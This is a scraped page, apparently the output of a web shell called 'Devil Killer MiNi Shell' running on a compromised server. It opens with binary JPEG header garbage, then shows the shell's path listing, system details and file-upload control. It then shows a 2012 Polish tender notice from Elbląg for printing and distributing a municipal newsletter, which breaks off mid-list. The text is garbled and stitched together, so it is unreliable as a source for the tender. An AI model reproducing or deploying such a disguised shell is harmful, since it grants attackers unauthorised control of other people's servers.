JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120419/88935-N-2012.html

<p class="kh_header"><b>Elbląg: Druk i dystrybucja Elbląskiego Serwisu Miejskiego</b><br>
<b>Numer ogłoszenia: 88935 - 2012; data zamieszczenia: 19.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Elbląg , ul. Łączności 1, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 55 235 35 36, 55 239 31 25, faks 55 239 33 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umelblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Druk i dystrybucja Elbląskiego Serwisu Miejskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
Druk i dystrybucja Elbląskiego Serwisu Miejskiego
Przedmiot główny:
CPV:	79.82.40.00 - 6 
Nazewnictwo wg CPV:	Usługi drukowania i dystrybucji
2.	Zakres zamówienia obejmuje:
I.	Wykonanie i dystrybucja Elbląskiego Serwisu Miejskiego - numer 2/2012 - czerwiec 2012 na terenie miasta Elbląg.  Zamówienie obejmuje cały proces technologiczny: opracowanie graficzne, skład, druk i dystrybucja Elbląskiego Serwisu Miejskiego - numer 2/2012 - czerwiec 2012.
Do obowiązków Wykonawcy należy: 
1/ Przygotowanie projektu graficznego i składu Elbląskiego Serwisu Miejskiego - numer 2/2012 - czerwiec 2012  wg poniższych wytycznych:
1) Przygotowanie 2 propozycji projektów graficznych Elbląskiego Serwisu Miejskiego - numer 2/2012 - czerwiec 2012. Wyboru jednej propozycji dokona Zamawiający.
2) Przygotowanie pełnego składu Elbląskiego Serwisu Miejskiego - numer 2/2012 - czerwiec 2012  i przedłożenie do akceptacji Zamawiającego.
3) Zamawiający zastrzega sobie prawo do zlecenia Wykonawcy korekt redakcyjnych, projektu graficznego oraz składu, treści artykułów do momentu uzyskania akceptacji Zamawiającego. 
4) Wykonawca zobowiązuje się do dokonania korekt edytorskich. 
5) Wykonawca zobowiązuje się do przedłożenia Zamawiającemu do akceptacji Elbląskiego Serwisu Miejskiego - numer 2/2012 - czerwiec 2012 przed wydrukiem. 
2/	Druk Elbląskiego Serwisu Miejskiego - numer 2/2012 - czerwiec 2012 wg poniższych parametrów:
- nakład: 45 000 egz.
- papier: kreda mat. minimum 100 g/m2 (okładka + środek)
- kolor: 4+4 (okładka + środek)
- ilość stron: 16 (razem z okładką)
- szycie zeszytowo: 2 zszywki
- format: po złożeniu A4

3/ 	Wykonawca zobowiązany jest do dostarczenia Zamawiającemu przedmiotu zamówienia w formatach: PDF, CDR (plik edytowalny) lub PSD Adobe Photoshop (plik edytowalny), w dwóch kopiach zapisanych na nośniku CD.

4/ 	Dystrybucja Elbląskiego Serwisu Miejskiego - numer 2/2012 - czerwiec 2012 wg poniższych zasad:

1) Dystrybucja pełnego nakładu Elbląskiego Serwisu Miejskiego - numer 2/2012 - czerwiec 2012 do gospodarstw domowych na terenie miasta Elbląg. Do każdego egzemplarza Elbląskiego Serwisu Miejskiego zostanie przymocowana gumka, która umożliwi zawieszenie  Elbląskiego Serwisu Miejskiego na klamce drzwi do gospodarstwa domowego (jeden egzemplarz Elbląskiego Serwisu Miejskiego na klamce drzwi jednego gospodarstwa domowego).
2) 	Wykonawca przed realizacją zamówienia zobowiązany jest do przedłożenia do akceptacji Zamawiającego planu dystrybucji całego nakładu Elbląskiego Serwisu Miejskiego - numer 2/2012 - czerwiec 2012 zawierającego nazwy ulic w mieście Elbląg, a po realizacji przedstawienia raportu z wykonania dystrybucji (zawierającego ilość Elbląskiego Serwisu Miejskiego rozdysponowanych na danej ulicy wraz z datą ich dystrybucji). 

5/ Dystrybucja wydrukowanych ulotek promujących realizację projektu Przebudowa ulic oraz drogowych obiektów inżynierskich stanowiących ciąg drogi wojewódzkiej nr 503 w miasta Elbląga- etap I od Placu Słowiańskiego do ul. Obrońców Pokoju  w  formacie A4 składanych do A5, nakładzie 45 000 egz. wraz z Elbląskim Serwisem Miejskim - numer 2/2012 - czerwiec 2012 wg poniższych zasad:
- Wykonawca jest zobowiązany do odbioru pełnego nakładu wydrukowanych ulotek  promujących realizację projektu z miejsca wskazanego przez Zamawiającego na terenie   
     miasta Elbląg 
- Wykonawca zobowiązany jest do wspólnej dystrybucji wraz z Elbląskim Serwisem Miejskim - numer 2/2012 - czerwiec 2012 określonej w pkt I ust. 4 
6/ 	Wykonawca zobowiązany jest do realizacji przedmiotu zamówienia określonego w pkt I w terminie do 28 dni od daty udzielenia zamówienia.   
II.	Wykonanie i dystrybucja Elbląskiego serwisu miejskiego - numer 3/2012 - wrzesień 2012 na terenie miasta Elbląg. Zamówienie obejmuje cały proces technologiczny: opracowanie graficzne, skład, druk i dystrybucja Elbląskiego serwisu miejskiego - numer 3/2012 - wrzesień 2012
Do obowiązków Wykonawcy należy: 
1/ Przygotowanie projektu graficznego i składu Elbląskiego serwisu miejskiego - numer 3/2012 - wrzesień 2012  wg poniższych wytycznych:
1) Przygotowanie 2 propozycji projektów graficznych Elbląskiego serwisu miejskiego - numer 3/2012 - wrzesień 2012. Wyboru jednej propozycji dokona Zamawiający.
2) Przygotowanie pełnego składu Elbląskiego serwisu miejskiego - numer 3/2012 - wrzesień 2012 i przedłożenie do akceptacji Zamawiającego.
3)	Zamawiający zastrzega sobie prawo do zlecenia Wykonawcy korekt redakcyjnych, projektu graficznego oraz składu, treści artykułów do momentu uzyskania akceptacji Zamawiającego. 
4) 	Wykonawca zobowiązuje się do dokonania korekt edytorskich. 
5) Wykonawca zobowiązuje się do przedłożenia Zamawiającemu do akceptacji Elbląskiego serwisu miejskiego - numer 3/2012 - wrzesień 2012 przed wydrukiem. 
2/ Druk Elbląskiego serwisu miejskiego - numer 3/2012 - wrzesień 2012, wg  poniższych parametrów:
- nakład: 45 000 egz.
- papier: kreda mat. minimum 100 g/m2 (okładka + środek)
- kolor: 4+4 (okładka + środek)
- ilość stron: 16 (razem z okładką)
- szycie zeszytowo: 2 zszywki
- format: po złożeniu A4
3/ Wykonawca zobowiązany jest do dostarczenia Zamawiającemu przedmiotu zamówienia w formatach: PDF, CDR (plik edytowalny) lub PSD Adobe Photoshop (plik edytowalny), w dwóch kopiach zapisanych na nośniku CD.
4/  Dystrybucja Elbląskiego serwisu miejskiego - numer 3/2012 - wrzesień 2012 wg poniższych zasad:
1) Dystrybucja pełnego nakładu Elbląskiego serwisu miejskiego - numer 3/2012 - wrzesień 2012  do gospodarstw domowych  na terenie miasta Elbląg. Do każdego egzemplarza Elbląskiego Serwisu Miejskiego zostanie przymocowana gumka, która umożliwi zawieszenie Elbląskiego Serwisu Miejskiego na klamce drzwi do gospodarstwa domowego (jeden egzemplarz Elbląskiego Serwisu Miejskiego na klamce drzwi jednego gospodarstwa domowego).
2) Wykonawca przed realizacją zamówienia zobowiązany jest do przedłożenia do akceptacji Zamawiającego planu dystrybucji całego nakładu Elbląskiego Serwisu Miejskiego zawierającego nazwy ulic w mieście Elbląg, a po realizacji przedstawienia raportu z wykonania dystrybucji (zawierającego ilość Elbląskiego Serwisu Miejskiego rozdysponowanych na danej ulicy wraz z datą dystrybucji)
5/ 	Dystrybucja wydrukowanych ulotek dot. projektu Budowa Centrum Zarządzania Miejską  Siecią Szerokopasmową w Elblągu , w formacie A4 składanych do A5, nakładzie 45 000 egz. wraz z Elbląskim Serwisem Miejskim - numer 3/2012 - wrzesień 2012 wg poniższych zasad:
- Wykonawca jest zobowiązany do odbioru pełnego nakładu wydrukowanych ulotek  promujących realizację projektu z miejsca wskazanego przez Zamawiającego na terenie   miasta Elbląg 
- Wykonawca zobowiązany jest do wspólnej  dystrybucji wraz z Elbląskim Serwisem Miejskim - numer 3/2012 - wrzesień 2012 określonej w pkt II ust. 4 
6/ 	Wykonawca zobowiązany jest do realizacji przedmiotu zamówienia określonego w pkt II do dnia 28 sierpnia 2012 r. 
III.	Wykonanie i dystrybucja Elbląskiego Serwisu Miejskiego - numer 4/2012 - grudzień 2012 na terenie miasta Elbląg. Zamówienie obejmuje cały proces technologiczny: opracowanie graficzne, skład, druk i dystrybucja Elbląskiego Serwisu Miejskiego - numer 4/2012 - grudzień 2012. 
Do obowiązków Wykonawcy należy: 
1/ 	Przygotowanie projektu graficznego i składu Elbląskiego Serwisu Miejskiego -  numer 4/2012 - grudzień 2012 wg poniższych wytycznych:
1) Przygotowanie 2 propozycji projektów graficznych Elbląskiego Serwisu Miejskiego - numer 4/2012 - grudzień 2012. Wyboru jednej propozycji dokona Zamawiający.
2) Przygotowanie pełnego składu Elbląskiego Serwisu Miejskiego - numer 4/2012 - grudzień 2012 i przedłożenie do akceptacji Zamawiającego.
3)	Zamawiający zastrzega sobie prawo do zlecenia Wykonawcy korekt redakcyjnych, projektu graficznego oraz składu, treści artykułów do momentu uzyskania akceptacji Zamawiającego. 
4) 	Wykonawca zobowiązuje się do dokonania korekt edytorskich. 
5) Wykonawca zobowiązuje się do przedłożenia Zamawiającemu do akceptacji Elbląskiego Serwisu Miejskiego - numer 4/2012 - grudzień 2012 przed wydrukiem. 
2/ 	Druk Elbląskiego Serwisu Miejskiego - numer 4/2012 - grudzień 2012, wg poniższych parametrów:
- nakład: 45 000 egz.
- papier: kreda mat. minimum 100 g/m2 (okładka + środek)
- kolor: 4+4 (okładka + środek)
- ilość stron: 16 (razem z okładką)
- szycie zeszytowo: 2 zszywki
- format: po złożeniu A4
3/ Wykonawca zobowiązany jest do dostarczenia Zamawiającemu przedmiotu zamówienia w formatach: PDF, CDR (plik edytowalny) lub PSD Adobe Photoshop (plik edytowalny), w dwóch kopiach zapisanych na nośniku CD.
4/ 	Dystrybucja Elbląskiego Serwisu Miejskiego - numer 4/2012 - grudzień 2012 wg poniższych zasad:
1) 	Dystrybucja pełnego nakładu Elbląskiego Serwisu Miejskiego - numer 4/2012 - grudzień 2012 do gospodarstw domowych  na terenie miasta Elbląg. Do każdego egzemplarza gazetki zostanie przymocowana gumka, która umożliwi zawieszenie Elbląskiego Serwisu Miejskiego na klamce drzwi do gospodarstwa domowego (jeden egzemplarz Elbląskiego Serwisu Miejskiego na klamce drzwi jednego gospodarstwa domowego).
2) 	Wykonawca przed realizacją zamówienia zobowiązany jest do przedłożenia do akceptacji Zamawiającego planu dystrybucji całego nakładu Elbląskiego Serwisu Miejskiego zawierającego nazwy ulic w mieście Elbląg, a po realizacji przedstawienia raportu z wykonania dystrybucji (zawierającego ilość Elbląskiego Serwisu Miejskiego rozdysponowanych na danej ulicy wraz z datą dystrybucji). 
5/ 	Wykonawca zobowiązany jest do realizacji przedmiotu zamówienia określonego w pkt III do 30 listopada 2012 r. 
IV.	Wykonanie i dystrybucja Elbląskiego Serwisu Miejskiego - numer 1/2013 - luty 2013 na terenie miasta Elbląg. Zamówienie obejmuje cały proces technologiczny: opracowanie graficzne, skład, druk i dystrybucja Elbląskiego Serwisu Miejskiego - numer 1/2013 - luty 2013. 
Do obowiązków Wykonawcy należy: 
1/ Przygotowanie projektu graficznego i składu Elbląskiego Serwisu Miejskiego -  numer 1/2013 - luty 2013 wg poniższych wytycznych:
1) Przygotowanie 2 propozycji projektów graficznych Elbląskiego Serwisu Miejskiego - numer 1/2013 - luty 2013. Wyboru jednej propozycji dokona Zamawiający.
2) Przygotowanie pełnego składu Elbląskiego Serwisu Miejskiego - numer  1/2013 - luty 2013 i przedłożenie do akceptacji Zamawiającego.
3)	Zamawiający zastrzega sobie prawo do zlecenia Wykonawcy korekt redakcyjnych, projektu graficznego oraz składu, treści artykułów do momentu uzyskania akceptacji Zamawiającego. 
4) 	Wykonawca zobowiązuje się do dokonania korekt edytorskich. 
5) Wykonawca zobowiązuje się do przedłożenia Zamawiającemu do akceptacji Elbląskiego Serwisu Miejskiego - numer 1/2013 - luty 2013 przed wydrukiem. 
2/ 	Druk Elbląskiego Serwisu Miejskiego - numer 1/2013 - luty 2013, wg poniższych parametrów:
- nakład: 45 000 egz.
- papier: kreda mat. minimum 100 g/m2 (okładka + środek)
- kolor: 4+4 (okładka + środek)
- ilość stron: 16 (razem z okładką)
- szycie zeszytowo: 2 zszywki
- format: po złożeniu A4
3/ 	Wykonawca zobowiązany jest do dostarczenia Zamawiającemu przedmiotu zamówienia w formatach: PDF, CDR (plik edytowalny) lub PSD Adobe Photoshop (plik edytowalny), w dwóch kopiach zapisanych na nośniku CD.
4/ 	Dystrybucja Elbląskiego Serwisu Miejskiego - numer 1/2013 - luty 2013 wg poniższych zasad:
1) 	Dystrybucja pełnego nakładu Elbląskiego Serwisu Miejskiego - numer 1/2013 - luty 2013 do gospodarstw domowych  na terenie miasta Elbląg. Do każdego egzemplarza Elbląskiego Serwisu Miejskiego zostanie przymocowana gumka, która umożliwi zawieszenie Elbląskiego Serwisu Miejskiego na klamce drzwi do gospodarstwa domowego (jeden egzemplarz Elbląskiego Serwisu Miejskiego na klamce drzwi jednego gospodarstwa domowego).
2) 	Wykonawca przed realizacją zamówienia zobowiązany jest do przedłożenia do akceptacji Zamawiającego planu dystrybucji całego nakładu Elbląskiego Serwisu Miejskiego zawierającego nazwy ulic w mieście Elbląg, a po realizacji przedstawienia raportu z wykonania dystrybucji (zawierającego ilość Elbląskiego Serwisu Miejskiego rozdysponowanych na danej ulicy wraz z datą dystrybucji). 
5/ 	Wykonawca zobowiązany jest do realizacji przedmiotu zamówienia określonego w pkt IV do dnia 31 stycznia 2013 r. 
V.	Wykonanie i dystrybucja Elbląskiego Serwisu Miejskiego - numer  2/2013 - czerwiec 2013 na terenie miasta Elbląg. Zamówienie obejmuje cały proces technologiczny: opracowanie graficzne, skład, druk i dystrybucja Elbląskiego Serwisu Miejskiego - numer  2/2013 - czerwiec 2013. 
Do obowiązków Wykonawcy należy: 
1/ Przygotowanie projektu graficznego i składu Elbląskiego Serwisu Miejskiego -  numer 2/2013 - czerwiec 2013 wg poniższych wytycznych:
1) Przygotowanie 2 propozycji projektów graficznych Elbląskiego Serwisu Miejskiego - numer 2/2013 - czerwiec 2013. Wyboru jednej propozycji dokona Zamawiający.
2) Przygotowanie pełnego składu Elbląskiego Serwisu Miejskiego - numer 2/2013 - czerwiec 2013 i przedłożenie do akceptacji Zamawiającego.
3)	Zamawiający zastrzega sobie prawo do zlecenia Wykonawcy korekt redakcyjnych, projektu graficznego oraz składu, treści artykułów do momentu uzyskania akceptacji Zamawiającego. 
4) 	Wykonawca zobowiązuje się do dokonania korekt edytorskich. 
5) 	Wykonawca zobowiązuje się do przedłożenia Zamawiającemu do akceptacji Elbląskiego Serwisu Miejskiego - numer 2/2013 - czerwiec 2013 przed wydrukiem. 
2/ Druk Elbląskiego Serwisu Miejskiego - numer 2/2013 - czerwiec 2013, wg poniższych parametrów:
- nakład: 45 000 egz.
- papier: kreda mat. minimum 100 g/m2 (okładka + środek)
- kolor: 4+4 (okładka + środek)
- ilość stron: 16 (razem z okładką)
- szycie zeszytowo: 2 zszywki
- format: po złożeniu A4
3/ 	Wykonawca zobowiązany jest do dostarczenia Zamawiającemu przedmiotu zamówienia w formatach: PDF, CDR (plik edytowalny) lub PSD Adobe Photoshop (plik edytowalny), w dwóch kopiach zapisanych na nośniku CD.
4/ 	Dystrybucja Elbląskiego Serwisu Miejskiego - numer 2/2013 - czerwiec 2013 wg poniższych zasad:
1) Dystrybucja pełnego nakładu Elbląskiego Serwisu Miejskiego - numer 2/2013 - czerwiec 2013 do gospodarstw domowych  na terenie miasta Elbląg. Do każdego egzemplarza Elbląskiego Serwisu Miejskiego zostanie przymocowana gumka, która umożliwi zawieszenie Elbląskiego Serwisu Miejskiego na klamce drzwi do gospodarstwa domowego (jeden egzemplarz Elbląskiego Serwisu Miejskiego na klamce drzwi jednego gospodarstwa domowego).
2) Wykonawca przed realizacją zamówienia zobowiązany jest do przedłożenia do akceptacji Zamawiającego planu dystrybucji całego nakładu Elbląskiego Serwisu Miejskiego zawierającego nazwy ulic w mieście Elbląg, a po realizacji przedstawienia raportu z wykonania dystrybucji (zawierającego ilość Elbląskiego Serwisu Miejskiego rozdysponowanych na danej ulicy wraz z datą dystrybucji)
5/ 	Wykonawca zobowiązany jest do realizacji przedmiotu zamówienia określonego w pkt V do dnia 31 maja 2013 r. 
VI.	Wykonanie i dystrybucja Elbląskiego Serwisu Miejskiego - numer 3/2013 - wrzesień 2013 na terenie miasta Elbląg. Zamówienie obejmuje cały proces technologiczny: opracowanie graficzne, skład, druk i dystrybucja Elbląskiego Serwisu Miejskiego - numer 3/2013 - wrzesień 2013.
Do obowiązków Wykonawcy należy: 
1/ Przygotowanie projektu graficznego i składu Elbląskiego Serwisu Miejskiego -  numer 3/2013 - wrzesień 2013 wg poniższych wytycznych:
1) Przygotowanie 2 propozycji projektów graficznych Elbląskiego Serwisu Miejskiego - numer 3/2013 - wrzesień 2013. Wyboru jednej propozycji dokona Zamawiający.
2) Przygotowanie pełnego składu Elbląskiego Serwisu Miejskiego - numer 3/2013 -  wrzesień 2013 i przedłożenie do akceptacji Zamawiającego.
3)	Zamawiający zastrzega sobie prawo do zlecenia Wykonawcy korekt redakcyjnych, projektu graficznego oraz składu, treści artykułów do momentu uzyskania akceptacji Zamawiającego. 
4) 	Wykonawca zobowiązuje się do dokonania korekt edytorskich. 
5) 	Wykonawca zobowiązuje się do przedłożenia Zamawiającemu do akceptacji Elbląskiego Serwisu Miejskiego - numer 3/2013 - wrzesień 2013 przed wydrukiem. 
2/ 	Druk Elbląskiego Serwisu Miejskiego - numer 3/2013 - wrzesień 2013, wg  poniższych parametrów:
- nakład: 45 000 egz.
- papier: kreda mat. minimum 100 g/m2 (okładka + środek)
- kolor: 4+4 (okładka + środek)
- ilość stron: 16 (razem z okładką)
- szycie zeszytowo: 2 zszywki
- format: po złożeniu A4
3/ 	Wykonawca zobowiązany jest do dostarczenia Zamawiającemu przedmiotu zamówienia w formatach: PDF, CDR (plik edytowalny) lub PSD Adobe Photoshop (plik edytowalny), w dwóch kopiach zapisanych na nośniku CD.
4/ 	Dystrybucja Elbląskiego Serwisu Miejskiego - numer 3/2013 - wrzesień 2013 wg poniższych zasad:
1) 	Dystrybucja pełnego nakładu Elbląskiego Serwisu Miejskiego - numer 3/2013 - wrzesień 2013 do gospodarstw domowych  na terenie miasta Elbląg. Do każdego egzemplarza Elbląskiego Serwisu Miejskiego zostanie przymocowana gumka, która umożliwi zawieszenie gazetki na klamce drzwi do gospodarstwa domowego (jeden egzemplarz Elbląskiego Serwisu Miejskiego na klamce drzwi jednego gospodarstwa domowego).
2) 	Wykonawca przed realizacją zamówienia zobowiązany jest do przedłożenia do akceptacji Zamawiającego planu dystrybucji całego nakładu Elbląskiego Serwisu Miejskiego  zawierającego nazwy ulic w mieście Elbląg, a po realizacji przedstawienia raportu z wykonania dystrybucji (zawierającego ilość Elbląskiego Serwisu Miejskiego rozdysponowanych na danej ulicy wraz z datą dystrybucji)
5/ 	Wykonawca zobowiązany jest do realizacji przedmiotu zamówienia określonego w pkt VI do dnia 28 sierpnia 2013 r. 
VII. 	Wykonanie i dystrybucja Elbląskiego Serwisu Miejskiego - numer 4/2013 - grudzień 2013 na terenie miasta Elbląg. Zamówienie obejmuje cały proces technologiczny: opracowanie graficzne, skład, druk i dystrybucja Elbląskiego Serwisu Miejskiego - numer 4/2013 - grudzień 2013. 
Do obowiązków Wykonawcy należy: 
1/ Przygotowanie projektu graficznego i składu Elbląskiego Serwisu Miejskiego - numer 4/2013 - grudzień 2013 wg poniższych wytycznych:
1) Przygotowanie 2 propozycji projektów graficznych Elbląskiego Serwisu Miejskiego - numer 4/2013 - grudzień 2013. Wyboru jednej propozycji dokona Zamawiający.
2) 	Przygotowanie pełnego składu Elbląskiego Serwisu Miejskiego - numer 4/2013 -  grudzień 2013 i przedłożenie do akceptacji Zamawiającego.
3)	Zamawiający zastrzega sobie prawo do zlecenia Wykonawcy korekt redakcyjnych, projektu graficznego oraz składu, treści artykułów do momentu uzyskania akceptacji Zamawiającego. 
4) 	Wykonawca zobowiązuje się do dokonania korekt edytorskich. 
5) 	Wykonawca zobowiązuje się do przedłożenia Zamawiającemu do akceptacji Elbląskiego Serwisu Miejskiego - numer 4/2013 - grudzień 2013 przed  wydrukiem. 
2/	Druk Elbląskiego Serwisu Miejskiego - numer 4/2013 - grudzień 2013, wg poniższych parametrów:
- nakład: 45 000 egz.
- papier: kreda mat. minimum 100 g/m2 (okładka + środek)
- kolor: 4+4 (okładka + środek)
- ilość stron: 16 (razem z okładką)
- szycie zeszytowo: 2 zszywki
- format: po złożeniu A4
3/ 	Wykonawca zobowiązany jest do dostarczenia Zamawiającemu przedmiotu zamówienia w formatach: PDF, CDR (plik edytowalny) lub PSD Adobe Photoshop (plik edytowalny), w dwóch kopiach zapisanych na nośniku CD.
4/ 	Dystrybucja Elbląskiego Serwisu Miejskiego - numer 4/2013 - grudzień 2013 wg poniższych zsad:
1) 	Dystrybucja pełnego nakładu Elbląskiego Serwisu Miejskiego - numer 4/2013 - grudzień 2013 do gospodarstw domowych  na terenie miasta Elbląg. Do każdego egzemplarza Elbląskiego Serwisu Miejskiego zostanie przymocowana gumka, która umożliwi zawieszenie Elbląskiego Serwisu Miejskiego na klamce drzwi do gospodarstwa domowego (jeden egzemplarz Elbląskiego Serwisu Miejskiego na klamce drzwi jednego gospodarstwa domowego).
2) 	Wykonawca przed realizacją zamówienia zobowiązany jest do przedłożenia do akceptacji Zamawiającego planu dystrybucji całego nakładu Elbląskiego Serwisu Miejskiego zawierającego nazwy ulic w mieście Elbląg, a po realizacji przedstawienia raportu z wykonania dystrybucji (zawierającego ilość Elbląskiego Serwisu Miejskiego rozdysponowanych na danej ulicy wraz z datą dystrybucji)
5/ 	Wykonawca zobowiązany jest do realizacji przedmiotu zamówienia określonego w pkt VII do 30 listopada 2013 r. 
Realizacja projektu polegać będzie na wykonaniu wszystkich elementów określonych w opisie przedmiotu zamówienia.
4.	Zamawiający nie zastrzega w SIWZ, że część lub całość zamówienia nie może być powierzona podwykonawcom. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.82.40.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości:
2 000,00 złotych (słownie: dwa tysiące złotych),
Wadium należy wnieść przed upływem terminu składania ofert.
Wadium może być wnoszone w jednej lub w kilku następujących formach, zgodnie z art. 45 ustawy Prawo zamówień publicznych tj.:
-	w pieniądzu,
-	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-	w gwarancjach bankowych, 
